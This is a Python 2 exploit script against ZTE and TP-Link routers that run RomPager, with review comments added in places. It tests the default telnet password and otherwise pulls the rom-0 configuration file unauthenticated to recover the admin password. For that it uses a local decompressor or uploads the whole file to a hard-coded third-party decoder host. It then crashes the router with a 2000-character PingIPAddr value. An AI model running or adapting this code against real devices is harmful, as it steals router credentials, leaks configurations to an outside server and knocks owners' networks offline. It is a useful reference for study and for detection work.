#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: ZTE and TP-Link RomPager DoS Exploit
# Date: 10-05-2014
# Server Version: RomPager/4.07 UPnP/1.0
# Tested Routers: ZTE ZXV10 W300
# TP-Link TD-W8901G
# TP-Link TD-W8101G
# TP-Link TD-8840G
# Firmware: FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0
# Tested on: Kali Linux x86
#
# Notes: Please note this exploit may contain errors, and
# is provided "as it is". There is no guarantee
# that it will work on your target router(s), as
# the code may have to be adapted.
# This is to avoid script kiddie abuse as well.
#
# Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
# Author takes no responsibility for any kind of damage you cause.
#
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
#
# Original write-up: https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
# Video: https://www.youtube.com/watch?v=1fSECo2ewoo
# Dedicate to Nick Knight and Hood3dRob1n
#
# ./dos.py -i 192.168.1.1
import os
import re
import sys
import time
import urllib
import base64
import httplib
import urllib2
import requests
import optparse
import telnetlib
import subprocess
import collections
import unicodedata


class BitReader:
    """Sequential, most-significant-bit-first cursor over a string of bytes.

    Every element of *bytes* is passed through ord(), so the constructor
    expects a (Python 2) str whose characters are the raw bytes.  Bits are
    queued with bit 7 of each byte first, so reads come back MSB-first.
    """

    def __init__(self, bytes):
        self._bits = collections.deque()
        for ch in bytes:
            value = ord(ch)
            # Push bit 7 down to bit 0 so getBit() yields them MSB-first.
            self._bits.extend(bool((value >> shift) & 1) for shift in range(7, -1, -1))

    def getBit(self):
        """Pop and return the next bit as a bool (IndexError once exhausted)."""
        return self._bits.popleft()

    def getBits(self, num):
        """Return the next *num* bits as an unsigned int, first bit most significant."""
        value = 0
        for _ in range(num):
            value = (value << 1) | self.getBit()
        return value

    def getByte(self):
        """Return the next 8 bits as an int in 0..255."""
        return self.getBits(8)

    def __len__(self):
        """Number of bits not yet consumed."""
        return len(self._bits)


class RingList:
    """Bounded FIFO window: once *length* items are held, each append evicts the oldest."""

    def __init__(self, length):
        self.__data__ = collections.deque()
        self.__full__ = False
        self.__max__ = length

    def append(self, x):
        """Push *x*, first dropping the oldest entry if the window is already full."""
        if self.__full__:
            self.__data__.popleft()
        self.__data__.append(x)
        # The full flag latches on the first time the count reaches the limit
        # and is never cleared afterwards.
        self.__full__ = self.__full__ or self.size() == self.__max__

    def get(self):
        """Return the underlying deque, oldest item first."""
        return self.__data__

    def size(self):
        """Number of items currently held."""
        return len(self.__data__)

    def maxsize(self):
        """Capacity the window was created with."""
        return self.__max__

    def __getitem__(self, n):
        """Item at position *n*, or None when n is at/after the current size.

        Negative indexes are passed straight to the deque (they count from
        the newest item), so a negative index beyond the held count raises
        IndexError rather than returning None.
        """
        return None if n >= self.size() else self.__data__[n]


def filter_non_printable(str):
    """Drop control characters (code point <= 31) from *str*, keeping TAB (9).

    The parameter keeps its original name ``str`` (it shadows the builtin)
    so existing keyword callers are unaffected.
    """
    printable = (c for c in str if ord(c) == 9 or ord(c) > 31)
    return ''.join(printable)


def banner():
    """Return the ASCII-art title that main() prints (five lines, tab-indented)."""
    art = [
        ' \t\t _/_/_/ _/_/_/',
        '\t\t _/ _/ _/_/ _/',
        '\t\t _/ _/ _/ _/ _/_/',
        '\t\t _/ _/ _/ _/ _/',
        '\t\t_/_/_/ _/_/ _/_/_/ ',
    ]
    return '\n'.join(art)
def dos(host, password):
    """Send the malformed ping-tool form to *host* and report whether it stopped answering.

    The request is a POST to /Forms/tools_test_1, authenticated with HTTP Basic
    as 'admin' plus *password*, whose PingIPAddr field holds 2000 repetitions of
    the octal escape for 'A' (an abnormally long value for what is presumably an
    IP-address field).  For defenders, that request shape (oversized PingIPAddr
    on that form, sent to the web admin UI) is the thing to alert on; the
    mitigation is vendor firmware and keeping the admin interface off untrusted
    networks.  Exits the process via sys.exit(0) on both outcomes.
    """
    while (1):
        url = 'http://' +host+ '/Forms/tools_test_1'
        parameters = {
            'Test_PVC' : 'PVC0',
            'PingIPAddr' : '\101'*2000,
            'pingflag' : '1',
            'trace_open_flag' : '0',
            'InfoDisplay' : '+-+Info+-%0D%0A'
        }
        params = urllib.urlencode(parameters)
        req = urllib2.Request(url, params)
        # Basic auth over plain http://: the credential is visible on the wire.
        # encodestring() appends a newline, hence the replace().
        base64string = base64.encodestring('%s:%s' % ('admin', password)).replace('\n', '')
        req.add_header("Authorization", "Basic %s" %base64string)
        req.add_header("Content-type", "application/x-www-form-urlencoded")
        req.add_header("Referer", "http://" +host+ "/maintenance/tools_test.htm")
        try:
            print '[~] Sending Payload'
            # 1 s timeout: a device that stops responding surfaces here as an exception.
            response = urllib2.urlopen(req, timeout=1)
            sys.exit(0)
        # NOTE(review): a bare except also catches the SystemExit raised by
        # sys.exit(0) just above, so this branch runs on success, timeout and
        # any other error alike.
        except:
            # checkHost() returns 0 on a successful ping and None otherwise.
            flag = checkHost(host)
            if flag == 0:
                print '[+] The host is still up and running'
            else:
                print '[~] Success! The host is down'
                sys.exit(0)
            # NOTE(review): the indentation of this break was lost in the paste;
            # at the except level it ends the loop after a single attempt, so
            # `while (1)` never iterates twice -- confirm against the original.
            break


def checkHost(host):
    """Return 0 if *host* answers two ICMP echo requests, None otherwise.

    The ping command line is built by string concatenation and run with
    shell=True, so *host* is interpolated unescaped into a shell command:
    a value containing shell metacharacters would execute on the operator's
    own machine.  A list argv with shell=False would close that hole.
    check_call() returns 0 on success and raises on a non-zero exit; the
    bare except swallows that (and anything else) and falls off the end,
    i.e. returns None, which callers comparing with 0 treat as "down".
    """
    if sys.platform == 'win32':
        c = "ping -n 2 " + host
    else:
        c = "ping -c 2 " + host
    try:
        x = subprocess.check_call(c, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        time.sleep(1)
        return x
    except:
        pass


def checkServer(host):
    """Return 0 when /status.html on *host* reports Server 'RomPager/4.07 UPnP/1.0', else 1.

    Uses plain HTTP on the default port; the connection is closed before the
    2 s pause.  The same Server header is what a defender can key on when
    inventorying exposed devices of this type.
    """
    connexion = httplib.HTTPConnection(host)
    connexion.request("GET", "/status.html")
    response = connexion.getresponse()
    server = response.getheader("server")
    connexion.close()
    time.sleep(2)
    if server == 'RomPager/4.07 UPnP/1.0':
        return 0
    else:
        return 1


def checkPassword(host):
    """Test the default telnet password on *host*, recover it otherwise, then call dos().

    Telnet (port 23, 4 s connect timeout) is used only as a yes/no oracle for
    the default password 'admin'.  If that fails, the operator chooses between
    decodePasswordLocal() and decodePasswordRemote(); both download /rom-0
    from the device without any credentials.  The prompt loop repeats until a
    decoder call completes: any exception (including IndexError from an empty
    answer, via msg[0]) is printed and the question asked again.
    Defender note: the default credential and the unauthenticated rom-0
    download are the two conditions this path depends on -- change the
    password and keep telnet/HTTP management off the WAN side.
    """
    print '[+] Checking for default password'
    defaultpass = 'admin'
    tn = telnetlib.Telnet(host, 23, 4)
    tn.read_until("Password: ")
    tn.write(defaultpass + '\n')
    time.sleep(2)
    banner = tn.read_eager()
    # Pattern is len('admin') == 5 dots followed by '\w+' (the non-raw '\w'
    # survives only because Python 2 leaves unknown escapes untouched).  The
    # whole match must equal 'Copyright' below, i.e. the first match found
    # has to be that nine-letter word; anything else counts as "not default".
    banner = regex(len(defaultpass)*r'.'+'\w+' , banner)
    tn.write("exit\n")
    tn.close()
    time.sleep(4)
    if banner == 'Copyright':
        print '[+] Default password is being used'
        dos(host, defaultpass)
    else:
        print '[!] Default Password is not being used'
        while True:
            msg = str(raw_input('[?] Decrypt the rom-0 file locally? ')).lower()
            try:
                if msg[0] == 'y':
                    password = decodePasswordLocal(host)
                    print '[*] Router password is: ' +password
                    dos(host, password)
                    break
                if msg[0] == 'n':
                    password = decodePasswordRemote(host)
                    print '[*] Router password is: ' +password
                    dos(host, password)
                    break
                else:
                    print '[!] Enter a valid choice'
            except Exception, e:
                print e
                continue


def decodePasswordRemote(host):
    """Fetch /rom-0 from *host*, upload it to a third-party decoder and scrape the password.

    The entire router configuration file -- not only the password -- is
    posted to the hard-coded external URL below; anyone operating or
    intercepting that service receives the device's config.  verify=False
    disables certificate checks for any https redirect that
    allow_redirects=True might follow.  The handle opened for the upload is
    never closed.
    NOTE(review): the not-found branch assigns `password` but the function
    returns `passwd`, so a reply without 'rows=10>' raises NameError instead
    of returning 'NotFound'.
    """
    fname = 'rom-0'
    if os.path.isfile(fname) == True:
        os.remove(fname)
    # No credentials are sent: the device serves rom-0 unauthenticated.
    urllib.urlretrieve ("http://"+host+"/rom-0", fname)
    # If this URL goes down you might have to find one and change this function.
    # You can also use the local decoder. It might have few errors in getting output.
    url = 'http://198.61.167.113/zynos/decoded.php' # third-party decoder; receives the full config
    files = {'uploadedfile': open('rom-0', 'rb') } # rom-0 just downloaded; handle is never closed
    data = {'MAX_FILE_SIZE': 1000000, 'submit': 'Upload rom-0'} # form fields the decoder page expects
    headers = { 'User-agent' : 'Python Demo Agent v1' } # extra request headers
    res = requests.post(url, files=files, data=data, headers=headers, allow_redirects=True, timeout=30.0, verify=False )
    res1 =res.content
    # The password is scraped from the text after 'rows=10>' in the returned HTML.
    p = re.search('rows=10>(.*)', res1)
    if p:
        passwd = found = p.group(1)
    else:
        password = 'NotFound'
    return passwd


def decodePasswordLocal(host):
    """Fetch /rom-0 from *host* and decode the password from it without any third party.

    Bytes 8568..8787 of rom-0 are read (fpos/fend/amount are hard-coded,
    presumably for the firmware named in the file header -- TODO confirm) and
    fed through an LZ-style literal/back-reference decoder: each step reads a
    flag bit; 0 means a literal byte follows, 1 means a back-reference whose
    offset is 7 bits (after a second 1 bit; offset 0 terminates the stream)
    or 11 bits (after a 0 bit), followed by a variable-length length field.
    Copies come from a 2048-entry RingList window.  The decoded text is
    whitespace-stripped, cut at the first vendor marker ('TP-LINK', 'ZTE' or
    'tc160'), and the text before the marker minus its first character is
    returned as the password.
    """
    # Sometimes this might output a wrong password while finding the exact string.
    # print the result as mentioned below and manually find out
    fname = 'rom-0'
    if os.path.isfile(fname) == True:
        os.remove(fname)
    # No credentials are sent: the device serves rom-0 unauthenticated.
    urllib.urlretrieve ("http://"+host+"/rom-0", fname)
    fpos=8568
    fend=8788
    # NOTE(review): handle is never closed; `chunk` is unused.
    fhandle=file('rom-0')
    fhandle.seek(fpos)
    chunk="*"
    amount=221
    while fpos < fend:
        # NOTE(review): `amount = amount` is a no-op; with fend-fpos == 220 < 221
        # the loop does a single read and `data` holds the whole region.
        if fend-fpos < amount:
            amount = amount
        data = fhandle.read(amount)
        fpos += len(data)
    reader = BitReader(data)
    result = ''
    window = RingList(2048)
    while True:
        bit = reader.getBit()
        if not bit:
            # Flag 0: next 8 bits are a literal byte.
            char = reader.getByte()
            result += chr(char)
            window.append(char)
        else:
            bit = reader.getBit()
            if bit:
                # 7-bit offset; zero is the end-of-stream marker.
                offset = reader.getBits(7)
                if offset == 0:
                    break
            else:
                offset = reader.getBits(11)
            # Length field: 2 bits (values 0..2 -> 2..4); 3 extends by 2 more
            # bits (values < 15 -> 5..19); 15 extends by 4-bit groups, each
            # further 15 adding 15 to the total.
            lenField = reader.getBits(2)
            if lenField < 3:
                lenght = lenField + 2
            else:
                lenField <<= 2
                lenField += reader.getBits(2)
                if lenField < 15:
                    lenght = (lenField & 0x0f) + 5
                else:
                    lenCounter = 0
                    lenField = reader.getBits(4)
                    while lenField == 15:
                        lenField = reader.getBits(4)
                        lenCounter += 1
                    lenght = 15*lenCounter + 8 + lenField
            # Copy from `offset` items back; RingList only guards n >= size,
            # so an offset larger than what has been decoded raises IndexError.
            for i in xrange(lenght):
                char = window[-offset]
                result += chr(char)
                window.append(char)
    # Strip control characters, resolve backslash escapes, drop non-ASCII.
    result = filter_non_printable(result).decode('unicode_escape').encode('ascii','ignore')
    # In case the password you see is wrong while filtering, manually print it from here and findout.
    #print result
    # For each vendor marker: remove all whitespace, keep the text before the
    # marker, then drop that text's first character.
    if 'TP-LINK' in result:
        result = ''.join(result.split()).split('TP-LINK', 1)[0] + 'TP-LINK';
        result = result.replace("TP-LINK", "")
        result = result[1:]
    if 'ZTE' in result:
        result = ''.join(result.split()).split('ZTE', 1)[0] + 'ZTE';
        result = result.replace("ZTE", "")
        result = result[1:]
    if 'tc160' in result:
        result = ''.join(result.split()).split('tc160', 1)[0] + 'tc160';
        result = result.replace("tc160", "")
        result = result[1:]
    return result


def regex(path, text):
    """Return the full text of the first match of pattern *path* in *text*, or None."""
    match = re.search(path, text)
    if match:
        return match.group()
    else:
        return None


def main():
    """Parse -i <host>, check reachability and Server header, then hand off to checkPassword().

    Ctrl-C / Ctrl-D anywhere in the flow exit cleanly.  `exit(-1)` on the
    missing-argument path uses the site builtin rather than sys.exit().
    """
    if sys.platform == 'win32':
        os.system('cls')
    else:
        os.system('clear')
    try:
        print banner()
        print '''
|=--------=[ ZTE and TP-Link RomPager Denial of Service Exploit ]=-------=|\n
[*] Author: Osanda Malith Jayathissa
[*] Follow @OsandaMalith
[!] Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
[!] Author takes no responsibility for any kind of damage you cause. '''
        parser = optparse.OptionParser("usage: %prog -i <IP Address> ")
        parser.add_option('-i', dest='host',
                          type='string',
                          help='Specify the IP to attack')
        (options, args) = parser.parse_args()
        if options.host is None:
            parser.print_help()
            exit(-1)
        host = options.host
        # checkHost(): 0 means ping succeeded; None (swallowed failure) means down.
        x = checkHost(host)
        if x == 0:
            print '[+] The host is up and running'
            server = checkServer(host)
            if server == 0:
                checkPassword(host)
            else:
                print ('[!] Sorry the router is not running RomPager')
        else:
            print '[!] The host is not up and running'
            sys.exit(0)
    except KeyboardInterrupt:
        print '[!] Ctrl + C detected\n[!] Exiting'
        sys.exit(0)
    except EOFError:
        print '[!] Ctrl + D detected\n[!] Exiting'
        sys.exit(0)


if __name__ == "__main__":
    main()
#EOF
